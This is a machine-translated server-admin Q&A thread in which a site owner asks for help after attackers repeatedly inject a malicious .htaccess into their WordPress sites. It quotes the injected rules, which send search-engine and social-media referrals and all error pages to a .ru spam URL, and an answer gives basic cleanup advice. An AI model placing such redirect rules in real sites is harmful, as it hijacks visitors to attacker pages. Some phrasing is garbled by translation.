可能重复:
我的服务器被黑了 紧急求助
似乎有一个恶意脚本正在访问我的服务器并编辑我托管的所有网站的 .htaccess 文件以重定向到垃圾链接。
阻止这种情况发生的最佳方法是什么?
我已经更改了服务器访问详细信息,包括控制面板和 FTP 访问,并尝试使用以下代码更新现有的 .htaccess 文件,但它似乎仍在发生变化。
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
还有什么可以帮忙的吗?
抱歉,信息不全,我对服务器等还很陌生,所以如果需要任何额外的详细信息,请大声说出来!
在此先感谢您的帮助。
担
******* 编辑 *******
根据请求获取恶意 .htaccess 文件
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
</IfModule>
# STRONG HTACCESS PROTECTION</code>
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 400 http://byidelement.ru/ruby/index.php
ErrorDocument 401 http://byidelement.ru/ruby/index.php
ErrorDocument 403 http://byidelement.ru/ruby/index.php
ErrorDocument 404 http://byidelement.ru/ruby/index.php
ErrorDocument 500 http://byidelement.ru/ruby/index.php
答案1
跑步chkroot工具快点,以防万一。
确保所有软件包都已更新并修复了安全问题:
- Ubuntu/Debian:
apt-get update; apt-get dist-upgrade - CentOS/Fedora/RHEL:
yum upgrade
不过,这可能是您所运行的 Wordpress 版本(或其他现成框架)中的一个已知漏洞,现在人们发现它一次又一次地被远程利用。如果是这种情况,请搜索您正在运行的所有框架的最新版本并检查安全修复程序。
假设它被远程利用,可以通过运行tailWeb 服务器访问日志并观察任何可疑活动来确认。tail -f /var/log/apache2/access-log将是 Ubuntu 安装中的命令,但所有发行版都将其 Apache 日志放在不同的地方。当您看到可疑的东西时,您就会知道哪个 VirtualHost 已被入侵。如果您喜欢冒险,也可以扫描您的历史访问日志。这在高流量服务器上可能很艰巨,但会显示攻击点。通过在您知道第一次攻击发生的时间附近搜索来缩小搜索范围。